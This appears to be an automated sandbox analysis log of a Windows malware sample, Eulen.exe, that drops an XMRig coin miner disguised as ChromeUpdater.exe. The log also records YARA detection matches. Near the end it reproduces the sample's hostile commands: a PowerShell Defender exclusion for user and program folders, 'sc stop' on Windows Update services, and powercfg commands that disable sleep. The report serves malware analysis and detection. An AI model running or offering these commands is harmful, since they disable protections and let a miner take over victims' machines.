          Source: C:\Windows\System32\dwm.exeCode function: 24_2_0000026DB15A165824_2_0000026DB15A1658
          Source: C:\Windows\System32\dwm.exeCode function: 24_2_0000026DB15920DC24_2_0000026DB15920DC
          Source: C:\Windows\System32\dwm.exeCode function: 24_2_0000026DB159B03024_2_0000026DB159B030
          Source: C:\Windows\System32\dwm.exeCode function: 24_2_0000026DB159F2F824_2_0000026DB159F2F8
          Source: C:\Windows\System32\dwm.exeCode function: 24_2_0000026DB15CBE3C24_2_0000026DB15CBE3C
          Source: C:\Windows\System32\dwm.exeCode function: 24_2_0000026DB15D225824_2_0000026DB15D2258
          Source: C:\Windows\System32\dwm.exeCode function: 24_2_0000026DB15C2CDC24_2_0000026DB15C2CDC
          Source: C:\Windows\System32\dwm.exeCode function: 24_2_0000026DB15CBC3024_2_0000026DB15CBC30
          Source: C:\Windows\System32\dwm.exeCode function: 24_2_0000026DB15CFEF824_2_0000026DB15CFEF8
          Source: C:\Windows\System32\dwm.exeCode function: 24_2_0000026DB15FB23C24_2_0000026DB15FB23C
          Source: C:\Windows\System32\dwm.exeCode function: 24_2_0000026DB160165824_2_0000026DB1601658
          Source: C:\Windows\System32\dwm.exeCode function: 24_2_0000026DB15F20DC24_2_0000026DB15F20DC
          Source: C:\Windows\System32\dwm.exeCode function: 24_2_0000026DB15FB03024_2_0000026DB15FB030
          Source: C:\Windows\System32\dwm.exeCode function: 24_2_0000026DB15FF2F824_2_0000026DB15FF2F8
          Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002A3EFFCB23C26_2_000002A3EFFCB23C
          Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002A3EFFC20DC26_2_000002A3EFFC20DC
          Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002A3EFFCB03026_2_000002A3EFFCB030
          Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002A3EFFCF2F826_2_000002A3EFFCF2F8
          Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002A3EFFD165826_2_000002A3EFFD1658
          Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002A3F067225826_2_000002A3F0672258
          Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002A3F066FEF826_2_000002A3F066FEF8
          Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002A3F066BC3026_2_000002A3F066BC30
          Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002A3F0662CDC26_2_000002A3F0662CDC
          Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002A3F066BE3C26_2_000002A3F066BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9AFB820DC27_2_000002C9AFB820DC
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9AFB8B03027_2_000002C9AFB8B030
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9AFB8F2F827_2_000002C9AFB8F2F8
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9AFB9165827_2_000002C9AFB91658
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9AFB8B23C27_2_000002C9AFB8B23C
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9AFBB2CDC27_2_000002C9AFBB2CDC
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9AFBBBC3027_2_000002C9AFBBBC30
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9AFBBFEF827_2_000002C9AFBBFEF8
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9AFBC225827_2_000002C9AFBC2258
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9AFBBBE3C27_2_000002C9AFBBBE3C
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9B02A225827_2_000002C9B02A2258
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9B029BE3C27_2_000002C9B029BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9B029FEF827_2_000002C9B029FEF8
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9B029BC3027_2_000002C9B029BC30
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9B0292CDC27_2_000002C9B0292CDC
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000002C06F7BB23C28_2_000002C06F7BB23C
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000002C06F7C165828_2_000002C06F7C1658
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000002C06F7B20DC28_2_000002C06F7B20DC
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000002C06F7BB03028_2_000002C06F7BB030
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000002C06F7BF2F828_2_000002C06F7BF2F8
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000002C06FD5225828_2_000002C06FD52258
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000002C06FD4BE3C28_2_000002C06FD4BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000002C06FD42CDC28_2_000002C06FD42CDC
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000002C06FD4BC3028_2_000002C06FD4BC30
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000002C06FD4FEF828_2_000002C06FD4FEF8
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C3820DC29_2_000002917C3820DC
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C39165829_2_000002917C391658
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C38B23C29_2_000002917C38B23C
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C38F2F829_2_000002917C38F2F8
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C38B03029_2_000002917C38B030
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C3B2CDC29_2_000002917C3B2CDC
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C3C225829_2_000002917C3C2258
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C3BBE3C29_2_000002917C3BBE3C
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C3BFEF829_2_000002917C3BFEF8
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C3BBC3029_2_000002917C3BBC30
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C972CDC29_2_000002917C972CDC
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C97BE3C29_2_000002917C97BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C98225829_2_000002917C982258
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C97FEF829_2_000002917C97FEF8
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C97BC3029_2_000002917C97BC30
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002238279BC3030_2_000002238279BC30
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000022382792CDC30_2_0000022382792CDC
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002238279BE3C30_2_000002238279BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000223827A225830_2_00000223827A2258
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002238279FEF830_2_000002238279FEF8
          Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000028A1B882CDC31_2_0000028A1B882CDC
          Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000028A1B88BC3031_2_0000028A1B88BC30
          Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000028A1B88FEF831_2_0000028A1B88FEF8
          Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000028A1B89225831_2_0000028A1B892258
          Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000028A1B88BE3C31_2_0000028A1B88BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001486AD7FEF832_2_000001486AD7FEF8
          Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001486AD8225832_2_000001486AD82258
          Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001486AD7BC3032_2_000001486AD7BC30
          Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001486AD72CDC32_2_000001486AD72CDC
          Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001486AD7BE3C32_2_000001486AD7BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001486ADDFEF832_2_000001486ADDFEF8
          Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001486ADE225832_2_000001486ADE2258
          Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001486ADDBC3032_2_000001486ADDBC30
          Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001486ADD2CDC32_2_000001486ADD2CDC
          Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001486ADDBE3C32_2_000001486ADDBE3C
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3CA20DC33_2_0000024BD3CA20DC
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3CAB03033_2_0000024BD3CAB030
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3CAF2F833_2_0000024BD3CAF2F8
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3CAB23C33_2_0000024BD3CAB23C
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3CB165833_2_0000024BD3CB1658
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3CD2CDC33_2_0000024BD3CD2CDC
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3CDBC3033_2_0000024BD3CDBC30
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3CDFEF833_2_0000024BD3CDFEF8
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3CDBE3C33_2_0000024BD3CDBE3C
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3CE225833_2_0000024BD3CE2258
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3D32CDC33_2_0000024BD3D32CDC
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3D3BC3033_2_0000024BD3D3BC30
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3D3FEF833_2_0000024BD3D3FEF8
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3D3BE3C33_2_0000024BD3D3BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3D4225833_2_0000024BD3D42258
          Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001FA73D4165834_2_000001FA73D41658
          Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001FA73D3B23C34_2_000001FA73D3B23C
          Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001FA73D320DC34_2_000001FA73D320DC
          Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001FA73D3B03034_2_000001FA73D3B030
          Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001FA73D3F2F834_2_000001FA73D3F2F8
          Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001FA73D7225834_2_000001FA73D72258
          Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001FA73D6BE3C34_2_000001FA73D6BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001FA73D62CDC34_2_000001FA73D62CDC
          Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001FA73D6BC3034_2_000001FA73D6BC30
          Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001FA73D6FEF834_2_000001FA73D6FEF8
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E3EE20DC39_2_00000249E3EE20DC
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E3EEB03039_2_00000249E3EEB030
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E3EEF2F839_2_00000249E3EEF2F8
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E3EF165839_2_00000249E3EF1658
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E3EEB23C39_2_00000249E3EEB23C
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E3F520DC39_2_00000249E3F520DC
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E3F5B03039_2_00000249E3F5B030
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E3F5F2F839_2_00000249E3F5F2F8
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E3F6165839_2_00000249E3F61658
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E3F5B23C39_2_00000249E3F5B23C
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E430225839_2_00000249E4302258
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E42FBE3C39_2_00000249E42FBE3C
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E42FFEF839_2_00000249E42FFEF8
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E42FBC3039_2_00000249E42FBC30
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E42F2CDC39_2_00000249E42F2CDC
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E433225839_2_00000249E4332258
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E432BE3C39_2_00000249E432BE3C
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E432FEF839_2_00000249E432FEF8
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E432BC3039_2_00000249E432BC30
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E4322CDC39_2_00000249E4322CDC
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E49DF2F839_2_00000249E49DF2F8
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E49DB23C39_2_00000249E49DB23C
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E49E165839_2_00000249E49E1658
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E49D20DC39_2_00000249E49D20DC
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E49DB03039_2_00000249E49DB030
          Source: C:\Windows\System32\svchost.exeCode function: 41_2_000001CD021BB23C41_2_000001CD021BB23C
          Source: C:\Windows\System32\svchost.exeCode function: 41_2_000001CD021C165841_2_000001CD021C1658
          Source: C:\Windows\System32\svchost.exeCode function: 41_2_000001CD021BF2F841_2_000001CD021BF2F8
          Source: C:\Windows\System32\svchost.exeCode function: 41_2_000001CD021BB03041_2_000001CD021BB030
          Source: C:\Windows\System32\svchost.exeCode function: 41_2_000001CD021B20DC41_2_000001CD021B20DC
          Source: C:\Windows\System32\svchost.exeCode function: 41_2_000001CD0240BE3C41_2_000001CD0240BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 41_2_000001CD0241225841_2_000001CD02412258
          Source: C:\Windows\System32\svchost.exeCode function: 41_2_000001CD0240FEF841_2_000001CD0240FEF8
          Source: C:\Windows\System32\svchost.exeCode function: 41_2_000001CD0240BC3041_2_000001CD0240BC30
          Source: C:\Windows\System32\svchost.exeCode function: 41_2_000001CD02402CDC41_2_000001CD02402CDC
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269B9FDF2F842_2_00000269B9FDF2F8
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269B9FE165842_2_00000269B9FE1658
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269B9FDB23C42_2_00000269B9FDB23C
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269B9FD20DC42_2_00000269B9FD20DC
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269B9FDB03042_2_00000269B9FDB030
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269BA66BC3042_2_00000269BA66BC30
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269BA662CDC42_2_00000269BA662CDC
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269BA66BE3C42_2_00000269BA66BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269BA67225842_2_00000269BA672258
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269BA66FEF842_2_00000269BA66FEF8
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269BA6CBC3042_2_00000269BA6CBC30
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269BA6C2CDC42_2_00000269BA6C2CDC
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269BA6CBE3C42_2_00000269BA6CBE3C
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269BA6D225842_2_00000269BA6D2258
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269BA6CFEF842_2_00000269BA6CFEF8
          Source: Joe Sandbox ViewDropped File: C:\Program Files\Google\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
          Source: auqpbnqlvfdv.tmp.0.drStatic PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
          Source: ChromeUpdater.exe.0.drStatic PE information: Number of sections : 15 > 10
          Source: Eulen.exeStatic PE information: Number of sections : 15 > 10
          Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: 39.2.ChromeUpdater.exe.7ff60a0684a0.7.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 39.2.ChromeUpdater.exe.7ff60a0684a0.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 39.2.ChromeUpdater.exe.7ff60a0684a0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: 39.2.ChromeUpdater.exe.7ff60a08a0c0.8.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 39.2.ChromeUpdater.exe.7ff60a08a0c0.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 39.2.ChromeUpdater.exe.7ff60a08a0c0.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: 00000027.00000002.1776062016.00007FF609F4D000.00000004.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: C:\Windows\Temp\auqpbnqlvfdv.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: C:\Windows\Temp\auqpbnqlvfdv.tmp, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: C:\Windows\Temp\auqpbnqlvfdv.tmp, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: Eulen.exe, 00000000.00000002.1654102663.00007FF6E047D000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: Q|.slN3xf{U'pbf
          Source: Eulen.exe, 00000000.00000002.1654102663.00007FF6E047D000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: Aw b|.slN3xf{U'pbg
          Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@50/71@0/0
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF647342328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,14_2_00007FF647342328
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF647341AC4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,14_2_00007FF647341AC4
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF647342328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,14_2_00007FF647342328
          Source: C:\Users\user\Desktop\Eulen.exeFile created: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
          Source: C:\Users\user\Desktop\Eulen.exeFile created: C:\Users\user\AppData\Local\Temp\auqpbnqlvfdv.tmpJump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Eulen.exeReversingLabs: Detection: 15%
          Source: C:\Users\user\Desktop\Eulen.exeFile read: C:\Users\user\Desktop\Eulen.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Eulen.exe "C:\Users\user\Desktop\Eulen.exe"
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Eulen.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
